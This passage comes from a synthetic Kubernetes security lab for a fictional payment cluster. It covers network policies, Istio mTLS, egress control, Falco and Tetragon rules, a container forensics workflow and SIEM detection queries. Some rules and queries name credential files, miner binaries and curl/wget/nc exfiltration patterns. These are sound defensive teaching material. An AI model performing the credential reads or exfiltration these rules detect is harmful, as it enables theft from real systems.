      - "api.stripe.example.com"
      - "vault.novstar.example.com"
      ports: [443]
  # Deny all other external egress
  - action: Deny
    destination:
      notNets:
      - 10.0.0.0/8
      - 172.16.0.0/12
      - 192.168.0.0/16

Step 4.5: Istio Service Mesh Security — mTLS

# Install Istio (SYNTHETIC)
$ istioctl install --set profile=default -y

✔ Istio core installed
✔ Istiod installed
✔ Ingress gateways installed
✔ Installation complete

# Enable sidecar injection for the production namespace
$ kubectl label namespace cloudpay-prod istio-injection=enabled
namespace/cloudpay-prod labeled

# Restart deployments to inject sidecars
$ kubectl rollout restart deployment -n cloudpay-prod
deployment.apps/payment-gateway restarted
deployment.apps/auth-service restarted
deployment.apps/order-service restarted
deployment.apps/user-service restarted
deployment.apps/reporting-service restarted
deployment.apps/notification-service restarted

# Verify sidecar injection
$ kubectl get pods -n cloudpay-prod
NAME                                  READY   STATUS    RESTARTS   AGE
payment-gateway-7d8f9b6c4-abc12      2/2     Running   0          45s
auth-service-5f6d7e8c9-def34         2/2     Running   0          43s
order-service-3b4c5d6e7-ghi56        2/2     Running   0          41s

Enforce Strict mTLS:

# PeerAuthentication — enforce strict mTLS cluster-wide (SYNTHETIC)
apiVersion: security.istio.io/v1beta1
kind: PeerAuthentication
metadata:
  name: default
  namespace: istio-system
spec:
  mtls:
    mode: STRICT

---
# PeerAuthentication — namespace-level enforcement (SYNTHETIC)
apiVersion: security.istio.io/v1beta1
kind: PeerAuthentication
metadata:
  name: cloudpay-strict-mtls
  namespace: cloudpay-prod
spec:
  mtls:
    mode: STRICT

Istio Authorization Policies — Microsegmentation:

# AuthorizationPolicy — payment-gateway (SYNTHETIC)
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
  name: payment-gateway-authz
  namespace: cloudpay-prod
spec:
  selector:
    matchLabels:
      app: payment-gateway
  action: ALLOW
  rules:
  # Allow ingress controller
  - from:
    - source:
        namespaces: ["ingress-nginx"]
    to:
    - operation:
        methods: ["GET", "POST"]
        paths: ["/api/v1/payments/*", "/healthz"]
  # Allow auth-service callbacks
  - from:
    - source:
        principals: ["cluster.local/ns/cloudpay-prod/sa/auth-service-sa"]
    to:
    - operation:
        methods: ["POST"]
        paths: ["/api/v1/payments/verify"]

---
# AuthorizationPolicy — deny all by default in namespace (SYNTHETIC)
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
  name: deny-all
  namespace: cloudpay-prod
spec:
  {}  # Empty spec = deny all

---
# AuthorizationPolicy — auth-service (SYNTHETIC)
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
  name: auth-service-authz
  namespace: cloudpay-prod
spec:
  selector:
    matchLabels:
      app: auth-service
  action: ALLOW
  rules:
  - from:
    - source:
        principals:
        - "cluster.local/ns/cloudpay-prod/sa/payment-gateway-sa"
        - "cluster.local/ns/cloudpay-prod/sa/user-service-sa"
        - "cluster.local/ns/cloudpay-prod/sa/order-service-sa"
    to:
    - operation:
        methods: ["POST"]
        paths: ["/api/v1/auth/validate", "/api/v1/auth/token"]

# Verify mTLS enforcement (SYNTHETIC)
$ istioctl x describe pod payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod

Pod: payment-gateway-7d8f9b6c4-abc12
   Pod Revision: default
   Pod Ports: 8080 (payment-gateway), 15090 (istio-proxy)
Suggestion: add 'version' label to pod for Istio telemetry.
--------------------
Service: payment-gateway
   Port: http 8080/HTTP targets pod port 8080
--------------------
Effective PeerAuthentication:
   Workload mTLS mode: STRICT

# Check if plaintext traffic is rejected
$ kubectl exec test-client -n cloudpay-prod -- \
    wget -qO- --timeout=3 http://payment-gateway:8080/healthz
wget: error getting response: Connection reset by peer
# Connection reset: the sidecar rejects plaintext when STRICT mTLS is enforced

Step 4.6: Egress Control — Prevent Data Exfiltration

# Istio ServiceEntry — allow only approved external services (SYNTHETIC)
apiVersion: networking.istio.io/v1beta1
kind: ServiceEntry
metadata:
  name: allowed-external-apis
  namespace: cloudpay-prod
spec:
  hosts:
  - api.stripe.example.com
  - vault.novstar.example.com
  ports:
  - number: 443
    name: https
    protocol: TLS
  resolution: DNS
  location: MESH_EXTERNAL

---
# Sidecar — restrict egress for payment-gateway (SYNTHETIC)
apiVersion: networking.istio.io/v1beta1
kind: Sidecar
metadata:
  name: payment-gateway-sidecar
  namespace: cloudpay-prod
spec:
  workloadSelector:
    labels:
      app: payment-gateway
  outboundTrafficPolicy:
    mode: REGISTRY_ONLY              # Drop egress to hosts not registered below
  egress:
  - hosts:
    - "cloudpay-prod/*"              # Same namespace services
    - "istio-system/*"               # Istio control plane
    - "*/api.stripe.example.com"     # External payment API (via ServiceEntry)
    - "*/vault.novstar.example.com"  # Internal vault (via ServiceEntry)

Detection Queries — Network Policies

KQL — Detect unauthorized network connections:

// KQL: Detect pods communicating with cloud metadata service
// (Potential SSRF / credential theft via IMDS)
AzureNetworkAnalytics_CL
| where TimeGenerated > ago(1h)
| where DestIP_s == "169.254.169.254"
| extend SourcePod = SrcK8S_Name_s
| extend Namespace = SrcK8S_Namespace_s
| project TimeGenerated, SourcePod, Namespace, DestIP_s, DestPort_d,
          BytesSent = SentBytes_d, BytesReceived = ReceivedBytes_d
| sort by TimeGenerated desc

// KQL: Detect cross-namespace traffic (potential lateral movement)
AzureNetworkAnalytics_CL
| where TimeGenerated > ago(1h)
| where SrcK8S_Namespace_s != DestK8S_Namespace_s
| where SrcK8S_Namespace_s == "cloudpay-prod"
| project TimeGenerated, SrcPod = SrcK8S_Name_s,
          SrcNamespace = SrcK8S_Namespace_s,
          DestPod = DestK8S_Name_s,
          DestNamespace = DestK8S_Namespace_s,
          DestPort = DestPort_d, Protocol = L7Protocol_s
| summarize Count=count() by SrcPod, DestNamespace, DestPod, DestPort
| sort by Count desc

SPL — Detect network policy violations:

// SPL: Detect traffic to cloud metadata endpoint
index=kubernetes sourcetype="calico:flowlogs"
| where dest_ip="169.254.169.254"
| stats count by src_namespace, src_pod, dest_ip, dest_port, action
| sort -count
| rename src_namespace as "Source Namespace", src_pod as "Source Pod",
         dest_ip as "Destination IP", action as "Action"

// SPL: Detect denied network connections (NetworkPolicy enforcement)
index=kubernetes sourcetype="calico:flowlogs" action="deny"
| stats count by src_namespace, src_pod, dest_namespace, dest_pod,
                 dest_port, protocol
| where count > 10
| sort -count
| rename src_namespace as "Source NS", dest_namespace as "Dest NS",
         src_pod as "Source Pod", dest_pod as "Dest Pod"

Network Segmentation Architecture

┌─────────────────────────────────────────────────────────────────────┐
│                    CloudPay Network Segmentation                    │
│                                                                     │
│  ┌─────────────────────────────────────────────────────────┐        │
│  │  ingress-nginx namespace                                │        │
│  │  ┌────────────────────┐                                 │        │
│  │  │ Ingress Controller ├──────┐                          │        │
│  │  └────────────────────┘      │                          │        │
│  └──────────────────────────────┼──────────────────────────┘        │
│                                 │ Port 8080 only                    │
│  ┌──────────────────────────────┼──────────────────────────┐        │
│  │  cloudpay-prod namespace     │ (mTLS enforced)          │        │
│  │                              ▼                          │        │
│  │  ┌─────────────┐    ┌─────────────┐    ┌────────────┐   │        │
│  │  │  payment-   │───▶│  auth-      │◀───│  user-     │   │        │
│  │  └──────┬──────┘    └─────────────┘    └────────────┘   │        │
│  │         │                                               │        │
│  │         │ Port 5432                                     │        │
│  │  ┌──────▼──────┐    ┌─────────────┐                     │        │
│  │  │ PostgreSQL  │    │  Redis      │                     │        │
│  │  │ 10.50.2.10  │    │  10.50.2.20 │                     │        │
│  │  └─────────────┘    └─────────────┘                     │        │
│  │                                                         │        │
│  │  ╳ No cross-namespace egress                            │        │
│  │  ╳ No metadata endpoint (169.254.169.254)               │        │
│  │  ╳ No arbitrary external egress                         │        │
│  └─────────────────────────────────────────────────────────┘        │
│                                                                     │
│  ┌─────────────────────────────────────────────────────────┐        │
│  │  monitoring namespace (isolated)                        │        │
│  │  Prometheus ←── scrape allowed from prod pods           │        │
│  │  Grafana / Falco / Fluentd                              │        │
│  └─────────────────────────────────────────────────────────┘        │
└─────────────────────────────────────────────────────────────────────┘

Key Takeaways — Exercise 4

Network Security Principles

  1. Default-deny is essential — Kubernetes allows all traffic by default; always apply a default-deny NetworkPolicy first, then explicitly allow required flows
  2. Microsegmentation limits blast radius — If a pod is compromised, network policies restrict what the attacker can reach
  3. Block cloud metadata — Always deny egress to 169.254.169.254 to prevent SSRF-based credential theft from cloud instance metadata
  4. mTLS with Istio — Service mesh provides transport encryption, identity-based access control, and observability without application changes
  5. Egress control prevents exfiltration — Restrict outbound traffic to only approved external services
  6. Layer defenses — Kubernetes NetworkPolicy + Calico/Cilium extended policies + Istio AuthorizationPolicy provide complementary controls at different layers
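
The default-deny baseline from takeaway 1, in miniature. This is a reference sketch of the pattern applied in Exercise 4 (adjust the namespace to match your cluster):

```yaml
# NetworkPolicy — default deny all ingress and egress (SYNTHETIC)
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: cloudpay-prod
spec:
  podSelector: {}        # Empty selector = every pod in the namespace
  policyTypes:
  - Ingress
  - Egress
  # No ingress/egress rules listed = nothing is allowed
```

Apply this first, then layer the explicit allow policies from earlier in the exercise on top of it.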

Exercise 5: Runtime Security & Monitoring

Objective

Deploy comprehensive runtime security monitoring for the CloudPay cluster using Falco, eBPF-based detection, container forensics techniques, and log aggregation. Build an incident response workflow for containerized environments.

Prerequisites

  • Falco installed (from Exercise 3)
  • Fluentd or Fluent Bit for log aggregation
  • Understanding of Linux system calls and eBPF

Step 5.1: Advanced Falco Rule Writing

Extend the Falco rules from Exercise 3 with application-specific and behavioral detection rules:

# falco-cloudpay-application-rules.yaml (SYNTHETIC)
# Application-specific runtime security rules for CloudPay

# Rule: Detect cryptocurrency mining processes
- rule: Cryptominer Detected in Container
  desc: Detect known cryptocurrency mining processes or connections to mining pools
  condition: >
    spawned_process and
    container and
    (proc.name in ("xmrig", "ccminer", "cgminer", "bfgminer", "minerd",
                    "cpuminer", "ethminer", "nbminer") or
     (proc.name in ("python", "python3", "node", "java") and
      proc.cmdline contains "stratum+tcp"))
  output: >
    Cryptocurrency miner detected in container
    (process=%proc.name command=%proc.cmdline container=%container.name
     image=%container.image.repository namespace=%k8s.ns.name
     pod=%k8s.pod.name)
  priority: CRITICAL
  tags: [container, cryptomining, T1496]

# Rule: Detect sensitive file access patterns
- rule: Sensitive File Read in Container
  desc: Detect access to sensitive files that may indicate credential harvesting
  condition: >
    open_read and
    container and
    (fd.name in ("/etc/shadow", "/etc/passwd", "/etc/kubernetes/admin.conf",
                  "/root/.kube/config", "/root/.aws/credentials",
                  "/root/.ssh/id_rsa", "/root/.ssh/id_ed25519") or
     fd.name startswith "/var/run/secrets/")
  output: >
    Sensitive file accessed in container
    (user=%user.name file=%fd.name command=%proc.cmdline
     container=%container.name namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: HIGH
  tags: [container, credential_access, T1552]

# Rule: Detect unexpected network listeners
- rule: Unexpected Network Listener in Container
  desc: Detect a process binding to a port not defined in the pod spec
  condition: >
    evt.type in (bind, listen) and
    container and
    fd.sport != 8080 and
    fd.sport != 9090 and
    fd.sport != 15090 and
    fd.sport > 1024
  output: >
    Unexpected network listener in container
    (process=%proc.name port=%fd.sport command=%proc.cmdline
     container=%container.name namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: WARNING
  tags: [container, persistence, backdoor, T1205]

# Rule: Detect kubectl or curl to Kubernetes API from container
- rule: Kubernetes API Access from Container
  desc: Detect direct access to the Kubernetes API server from within a container
  condition: >
    container and
    ((evt.type in (connect, sendto)) and
     (fd.sip = "10.96.0.1" or fd.sip = "203.0.113.10") and
     fd.sport in (443, 6443))
  output: >
    Kubernetes API accessed from container
    (process=%proc.name command=%proc.cmdline dest=%fd.sip:%fd.sport
     container=%container.name namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: HIGH
  tags: [container, discovery, kubernetes_api, T1613]

# Rule: Detect package manager execution in production container
- rule: Package Manager in Production Container
  desc: Detect apt, yum, apk, or pip being run inside a production container
  condition: >
    spawned_process and
    container and
    proc.name in ("apt", "apt-get", "yum", "dnf", "apk", "pip", "pip3",
                   "npm", "gem", "cargo") and
    k8s.ns.name = "cloudpay-prod"
  output: >
    Package manager executed in production container — possible tampering
    (process=%proc.name command=%proc.cmdline container=%container.name
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: HIGH
  tags: [container, execution, supply_chain, T1195]

# Rule: Detect binary written to tmp or writable directory
- rule: Binary Written to Container
  desc: Detect a new binary or script being written to a container
  condition: >
    open_write and
    container and
    (fd.name startswith "/tmp/" or
     fd.name startswith "/dev/shm/" or
     fd.name startswith "/var/tmp/") and
    (fd.name endswith ".sh" or
     fd.name endswith ".py" or
     fd.name endswith ".so" or
     fd.name endswith ".elf" or
     evt.rawarg.flags contains "O_EXEC")
  output: >
    Executable file written in container
    (user=%user.name file=%fd.name command=%proc.cmdline
     container=%container.name namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: HIGH
  tags: [container, execution, dropper, T1105]

Step 5.2: eBPF-Based Container Monitoring

eBPF (extended Berkeley Packet Filter) provides deep kernel-level visibility without requiring kernel modules. Tools like Tetragon and Cilium Hubble leverage eBPF for security monitoring.

# Install Cilium Tetragon for eBPF-based security observability (SYNTHETIC)
$ helm repo add cilium https://helm.cilium.io && helm repo update
$ helm install tetragon cilium/tetragon -n kube-system

# Define a TracingPolicy for file access monitoring
# (TracingPolicyNamespaced scopes events to a single Kubernetes namespace;
#  Tetragon's matchNamespaces selector refers to Linux namespaces, not
#  Kubernetes ones, so it is not used here)
$ cat <<EOF | kubectl apply -f -
apiVersion: cilium.io/v1alpha1
kind: TracingPolicyNamespaced
metadata:
  name: file-access-monitoring
  namespace: cloudpay-prod
spec:
  kprobes:
  - call: "security_file_open"
    syscall: false
    args:
    - index: 0
      type: "file"
    selectors:
    - matchArgs:
      - index: 0
        operator: "Prefix"
        values:
        - "/etc/shadow"
        - "/etc/passwd"
        - "/var/run/secrets"
        - "/root/.ssh"
        - "/root/.aws"
        - "/root/.kube"
EOF

# Define a TracingPolicy for network connection monitoring
$ cat <<EOF | kubectl apply -f -
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: network-connection-monitoring
spec:
  kprobes:
  - call: "tcp_connect"
    syscall: false
    args:
    - index: 0
      type: "sock"
    selectors:
    - matchArgs:
      - index: 0
        operator: "DAddr"
        values:
        - "169.254.169.254"   # Cloud metadata
      matchActions:           # Same selector entry — separate list items are
      - action: "Sigkill"     # OR'd, so the action must sit with its matchArgs
EOF

# View Tetragon events (SYNTHETIC)
$ kubectl logs -n kube-system -l app.kubernetes.io/name=tetragon -c export-stdout | \
    jq 'select(.process_kprobe != null) | {
      time: .time,
      pod: .process_kprobe.process.pod.name,
      namespace: .process_kprobe.process.pod.namespace,
      binary: .process_kprobe.process.binary,
      arguments: .process_kprobe.process.arguments,
      function: .process_kprobe.function_name
    }'

{
  "time": "2026-03-24T11:30:45.123Z",
  "pod": "payment-gateway-7d8f9b6c4-abc12",
  "namespace": "cloudpay-prod",
  "binary": "/usr/local/bin/python3",
  "arguments": "/app/src/app.py",
  "function": "security_file_open"
}

Step 5.3: Container Forensics Workflow

When a container security incident occurs, follow this forensics workflow:

# ============================================================
# Container Forensics Workflow (SYNTHETIC)
# ============================================================

# Step 1: Identify the compromised pod
$ kubectl get pods -n cloudpay-prod -o wide
NAME                                  READY   STATUS    IP            NODE
payment-gateway-7d8f9b6c4-abc12      2/2     Running   10.244.1.15   10.50.1.10

# Step 2: Capture pod details BEFORE taking action
$ kubectl describe pod payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod > \
    /tmp/forensics/pod-describe.txt

$ kubectl get pod payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod -o yaml > \
    /tmp/forensics/pod-spec.yaml

# Step 3: Capture container logs
$ kubectl logs payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod \
    --all-containers --timestamps > /tmp/forensics/pod-logs.txt

# Previous container logs (if restarted)
$ kubectl logs payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod \
    --previous --timestamps > /tmp/forensics/pod-logs-previous.txt 2>/dev/null

# Step 4: Capture running processes inside the container
# (requires ps in the image — for distroless images, read /proc from the node)
$ kubectl exec payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod -- ps auxww > \
    /tmp/forensics/processes.txt

# Step 5: Capture network connections
$ kubectl exec payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod -- \
    cat /proc/net/tcp > /tmp/forensics/network-tcp.txt
$ kubectl exec payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod -- \
    cat /proc/net/tcp6 > /tmp/forensics/network-tcp6.txt

# Step 6: Capture filesystem state
$ kubectl exec payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod -- \
    find / -newer /app/src/app.py -type f 2>/dev/null > /tmp/forensics/modified-files.txt

# Step 7: Check for unusual environment variables
$ kubectl exec payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod -- env | sort > \
    /tmp/forensics/environment.txt

# Step 8: Copy container filesystem for offline analysis
$ kubectl cp cloudpay-prod/payment-gateway-7d8f9b6c4-abc12:/tmp /tmp/forensics/container-tmp/

# Step 9: Snapshot the container image layers for diff analysis
# Get the container ID from the node
$ CONTAINER_ID=$(kubectl get pod payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod \
    -o jsonpath='{.status.containerStatuses[0].containerID}' | cut -d'/' -f3)

# On the node: diff the container filesystem (SYNTHETIC — Docker runtime shown;
# on containerd nodes, inspect the container's snapshot with ctr instead)
$ docker diff $CONTAINER_ID > /tmp/forensics/container-diff.txt

# Example output:
# C /tmp
# A /tmp/suspicious-script.sh
# A /tmp/data-exfil.tar.gz
# C /etc/hosts
# A /dev/shm/payload.so

# Step 10: Isolate the pod — apply network quarantine
$ cat <<EOF | kubectl apply -f -
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: quarantine-compromised-pod
  namespace: cloudpay-prod
spec:
  podSelector:
    matchLabels:
      app: payment-gateway
      quarantine: "true"
  policyTypes:
  - Ingress
  - Egress
  # Empty rules = deny all traffic
EOF

# Label the pod for quarantine
$ kubectl label pod payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod quarantine=true

# Step 11: Preserve evidence — do NOT delete the pod yet
# Scale up a clean replacement
$ kubectl scale deployment payment-gateway -n cloudpay-prod --replicas=4
# The new pod will be scheduled; the quarantined pod remains for analysis
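
After collecting artifacts, hash them so later tampering is detectable. A minimal chain-of-custody sketch, assuming the /tmp/forensics directory populated by the steps above (coreutils only):

```shell
# Build a tamper-evident manifest of everything collected (SYNTHETIC paths)
mkdir -p /tmp/forensics && cd /tmp/forensics

# Record when the evidence was collected
date -u +"collected_at=%Y-%m-%dT%H:%M:%SZ" > evidence-manifest.meta

# Hash every artifact except the manifest itself
find . -type f ! -name 'evidence-manifest.sha256' -exec sha256sum {} + \
    | sort -k 2 > evidence-manifest.sha256

# Re-run at any time to verify nothing was altered (non-zero exit on mismatch)
sha256sum --check --quiet evidence-manifest.sha256
```

Store the manifest (ideally a signed copy) outside the cluster so it cannot be modified alongside the evidence.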

Step 5.4: Log Aggregation with Fluentd

# Fluentd DaemonSet configuration for container log collection (SYNTHETIC)
apiVersion: v1
kind: ConfigMap
metadata:
  name: fluentd-config
  namespace: monitoring
data:
  fluent.conf: |
    # Collect container logs
    <source>
      @type tail
      path /var/log/containers/*.log
      pos_file /var/log/fluentd-containers.log.pos
      tag kubernetes.*
      read_from_head true
      <parse>
        @type json
        time_key time
        time_format %Y-%m-%dT%H:%M:%S.%NZ
      </parse>
    </source>

    # Collect Falco alerts
    <source>
      @type tail
      path /var/log/falco/falco_events.log
      pos_file /var/log/fluentd-falco.log.pos
      tag falco.*
      <parse>
        @type json
      </parse>
    </source>

    # Collect Kubernetes audit logs
    <source>
      @type tail
      path /var/log/kubernetes/audit/kube-apiserver-audit.log
      pos_file /var/log/fluentd-kube-audit.log.pos
      tag kube.audit.*
      <parse>
        @type json
      </parse>
    </source>

    # Enrich logs with Kubernetes metadata
    <filter kubernetes.**>
      @type kubernetes_metadata
      @id filter_kube_metadata
    </filter>

    # Tag security-relevant events
    <filter kubernetes.**>
      @type grep
      <regexp>
        key log
        pattern /(error|warn|critical|security|unauthorized|forbidden|denied|escape|privilege|suspicious)/i
      </regexp>
    </filter>

    # Output to SIEM (SYNTHETIC — Elasticsearch/Splunk/Sentinel)
    <match **>
      @type elasticsearch
      host elasticsearch.monitoring.svc.cluster.local
      port 9200
      index_name k8s-security-logs
      type_name _doc
      logstash_format true
      logstash_prefix k8s-security
      <buffer>
        @type file
        path /var/log/fluentd-buffers/kubernetes.security.buffer
        flush_mode interval
        flush_interval 5s
        chunk_limit_size 2M
        queue_limit_length 32
        retry_max_interval 30
        retry_forever true
      </buffer>
    </match>

Step 5.5: Incident Response Playbook — Container Compromise

┌──────────────────────────────────────────────────────────────────┐
│           Container Compromise IR Playbook (SYNTHETIC)           │
├──────────────────────────────────────────────────────────────────┤
│                                                                  │
│  1. DETECT                                                       │
│     ├─ Falco alert triggered (Critical/High priority)            │
│     ├─ SIEM correlation rule matched                             │
│     ├─ Anomalous process/network activity detected               │
│     └─ Container image vulnerability scan flagged active CVE     │
│                                                                  │
│  2. TRIAGE (< 15 minutes)                                        │
│     ├─ Confirm alert is not false positive                       │
│     ├─ Identify affected pod, namespace, node, image             │
│     ├─ Determine blast radius (what can this pod access?)        │
│     └─ Assign severity: P1 (escape confirmed), P2 (suspicious),  │
│        P3 (policy violation)                                     │
│                                                                  │
│  3. CONTAIN (< 30 minutes)                                       │
│     ├─ Apply quarantine NetworkPolicy (deny all ingress/egress)  │
│     ├─ Label pod with quarantine=true                            │
│     ├─ DO NOT delete the pod (preserve evidence)                 │
│     ├─ Scale deployment to replace the compromised replica       │
│     ├─ Rotate any credentials the pod had access to:             │
│     │   ├─ Kubernetes service account tokens                     │
│     │   ├─ Database credentials                                  │
│     │   ├─ API keys and secrets                                  │
│     │   └─ Cloud IAM credentials (if IRSA/Workload Identity)     │
│     └─ Block the compromised image in admission controller       │
│                                                                  │
│  4. INVESTIGATE (< 2 hours)                                      │
│     ├─ Collect forensic artifacts (Step 5.3 workflow)            │
│     ├─ Analyze container diff for added/modified files           │
│     ├─ Review network flow logs for lateral movement             │
│     ├─ Check audit logs for RBAC abuse or API calls              │
│     ├─ Examine Falco timeline for sequence of events             │
│     ├─ Determine initial access vector:                          │
│     │   ├─ Vulnerable application code (RCE, SSRF)               │
│     │   ├─ Supply chain compromise (malicious image/dependency)  │
│     │   ├─ Exposed Kubernetes API or dashboard                   │
│     │   └─ Stolen credentials (service account token)            │
│     └─ Map findings to MITRE ATT&CK Containers matrix            │
│                                                                  │
│  5. ERADICATE                                                    │
│     ├─ Patch the vulnerable image and push to registry           │
│     ├─ Update NetworkPolicies to prevent recurrence              │
│     ├─ Add/update Falco rules for new IOCs                       │
│     ├─ Update admission controller policies                      │
│     └─ Redeploy clean workloads with hardened configuration      │
│                                                                  │
│  6. RECOVER                                                      │
│     ├─ Verify new deployment is healthy and secure               │
│     ├─ Confirm all rotated credentials are working               │
│     ├─ Monitor closely for 72 hours post-recovery                │
│     └─ Remove quarantine NetworkPolicy after evidence preserved  │
│                                                                  │
│  7. POST-INCIDENT                                                │
│     ├─ Write incident report with timeline                       │
│     ├─ Update runbooks and detection rules                       │
│     ├─ Conduct blameless retrospective                           │
│     ├─ Update security controls and policies                     │
│     └─ Share anonymized IOCs with threat intel community         │
│                                                                  │
└──────────────────────────────────────────────────────────────────┘

Step 5.6: Automated Response with Falco Sidekick

# Falco Sidekick configuration for automated response (SYNTHETIC)
# falcosidekick-config.yaml
apiVersion: v1
kind: ConfigMap
metadata:
  name: falcosidekick-config
  namespace: monitoring
data:
  config.yaml: |
    # Slack notifications for all priorities
    slack:
      webhookurl: "https://hooks.slack.example.com/services/REDACTED"
      channel: "#security-alerts"
      minimumpriority: "warning"
      messageformat: |
        *Priority:* {{ .Priority }}
        *Rule:* {{ .Rule }}
        *Output:* {{ .Output }}
        *Namespace:* {{ index .OutputFields "k8s.ns.name" }}
        *Pod:* {{ index .OutputFields "k8s.pod.name" }}
        *Container:* {{ index .OutputFields "container.name" }}
        *Image:* {{ index .OutputFields "container.image.repository" }}

    # PagerDuty for critical alerts
    pagerduty:
      routingkey: "REDACTED"
      minimumpriority: "critical"

    # Kubernetes response — label pods on critical alert
    kubernetesclient:
      enabled: true
      kubeconfig: ""  # Uses in-cluster config
      namespace: ""
      # On critical Falco alert: label the pod for quarantine
      labelsadd:
        - key: "security.novstar.example.com/alert"
          value: "critical"
        - key: "quarantine"
          value: "true"
      minimumpriority: "critical"

Step 5.7: Security Monitoring Dashboard Metrics

Key metrics to track in Grafana for container security:

# Prometheus recording rules for container security metrics (SYNTHETIC)
apiVersion: monitoring.coreos.com/v1
kind: PrometheusRule
metadata:
  name: container-security-rules
  namespace: monitoring
spec:
  groups:
  - name: container-security
    interval: 30s
    rules:
    # Count of containers running as root
    - record: container_security:root_containers:count
      expr: |
        count(
          kube_pod_container_info{namespace="cloudpay-prod"}
          * on(pod, namespace) group_left()
          (kube_pod_security_context{run_as_user="0"} or
           kube_pod_security_context{run_as_non_root="false"})
        ) or vector(0)

    # Count of privileged containers
    - record: container_security:privileged_containers:count
      expr: |
        count(
          kube_pod_container_info{namespace="cloudpay-prod"}
          * on(pod, namespace) group_left()
          kube_pod_security_context{privileged="true"}
        ) or vector(0)

    # Count of pods without resource limits
    - record: container_security:no_limits:count
      expr: |
        count(
          kube_pod_container_info{namespace="cloudpay-prod"}
          unless on(pod, namespace, container)
          kube_pod_container_resource_limits{resource="cpu"}
        ) or vector(0)

    # Falco critical alerts per hour
    - record: container_security:falco_critical:rate1h
      expr: |
        sum(rate(falco_events_total{priority="Critical"}[1h])) or vector(0)

    # Image vulnerabilities by severity
    - record: container_security:image_vulns:total
      expr: |
        sum by (severity) (
          trivy_vulnerability_count{namespace="cloudpay-prod"}
        )
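
Recording rules are most useful when paired with alerts. A sketch of an alerting group that could be appended to the same PrometheusRule spec (thresholds are illustrative, not tuned):

```yaml
  - name: container-security-alerts
    rules:
    # Any privileged container in cloudpay-prod should page immediately
    - alert: PrivilegedContainerRunning
      expr: container_security:privileged_containers:count > 0
      for: 5m
      labels:
        severity: critical
      annotations:
        summary: "Privileged container running in cloudpay-prod"
    # Sustained critical Falco activity suggests an active incident
    - alert: FalcoCriticalAlertSpike
      expr: container_security:falco_critical:rate1h > 0
      for: 10m
      labels:
        severity: high
      annotations:
        summary: "Sustained Falco critical alerts over the last hour"
```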

Detection Queries — Runtime Security

KQL — Comprehensive runtime detection:

// KQL: Detect cryptocurrency mining indicators in containers
ContainerLog
| where TimeGenerated > ago(1h)
| where LogEntry has_any ("stratum+tcp", "xmrig", "mining",
                           "hashrate", "coin", "pool.minergate",
                           "cryptonight", "randomx")
| project TimeGenerated, ContainerID, Image, Name, LogEntry
| summarize Count=count(), Examples=make_set(LogEntry, 3) by Image, Name
| sort by Count desc

// KQL: Detect data exfiltration from containers
ContainerLog
| where TimeGenerated > ago(4h)
| where LogEntry has_any ("curl", "wget", "nc ", "ncat")
| where LogEntry has_any ("POST", "PUT", "upload", "--data", "-d ")
| where LogEntry !has "healthz" and LogEntry !has "readyz"
| project TimeGenerated, ContainerID, Image, Name, LogEntry
| sort by TimeGenerated desc

// KQL: Container restart anomaly detection
KubePodInventory
| where TimeGenerated > ago(24h)
| where Namespace == "cloudpay-prod"
| summarize RestartCount = max(ContainerRestartCount) by Name, ContainerName, Image
| where RestartCount > 5
| sort by RestartCount desc

// KQL: Detect Kubernetes API access patterns from pods
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| extend UserAgent = tostring(AuditLog.userAgent)
| extend SourceIP = tostring(AuditLog.sourceIPs[0])
| extend Verb = tostring(AuditLog.verb)
| extend Resource = tostring(AuditLog.objectRef.resource)
| where UserAgent !has "kube-proxy" and UserAgent !has "kubelet"
| where SourceIP startswith "10.244."   // Pod network
| summarize Count=count() by SourceIP, Verb, Resource, UserAgent
| where Count > 10
| sort by Count desc

SPL — Runtime security monitoring:

// SPL: Detect anomalous processes in containers
index=kubernetes sourcetype="falco" priority IN ("Critical", "Error", "Warning")
| stats count by rule, priority, container_name, k8s_ns_name, k8s_pod_name
| sort -count
| head 50

// SPL: Detect file integrity violations in containers
index=kubernetes sourcetype="falco"
| search rule IN ("Binary Written to Container",
                  "Sensitive File Read in Container",
                  "Package Manager in Production Container")
| table _time, rule, priority, container_name, k8s_ns_name,
        k8s_pod_name, proc_cmdline, fd_name
| sort -_time

// SPL: Container security posture summary
index=kubernetes sourcetype="kube:objects:pods"
| spath "spec.containers{}.securityContext.privileged"
| spath "spec.containers{}.securityContext.runAsNonRoot"
| spath "spec.containers{}.securityContext.readOnlyRootFilesystem"
| eval privileged=if('spec.containers{}.securityContext.privileged'="true", 1, 0)
| eval nonroot=if('spec.containers{}.securityContext.runAsNonRoot'="true", 1, 0)
| eval readonly_fs=if('spec.containers{}.securityContext.readOnlyRootFilesystem'="true", 1, 0)
| stats sum(privileged) as PrivilegedContainers,
        sum(nonroot) as NonRootContainers,
        sum(readonly_fs) as ReadOnlyFSContainers,
        dc(pod_name) as TotalPods
        by namespace
| eval ComplianceScore = round((NonRootContainers + ReadOnlyFSContainers) / (TotalPods * 2) * 100, 1)
| sort -ComplianceScore

// SPL: Detect lateral movement attempts between containers
index=kubernetes sourcetype="calico:flowlogs"
| where action="allow" AND src_namespace="cloudpay-prod" AND dest_namespace="cloudpay-prod"
| stats count as connection_count, dc(dest_pod) as unique_destinations by src_pod
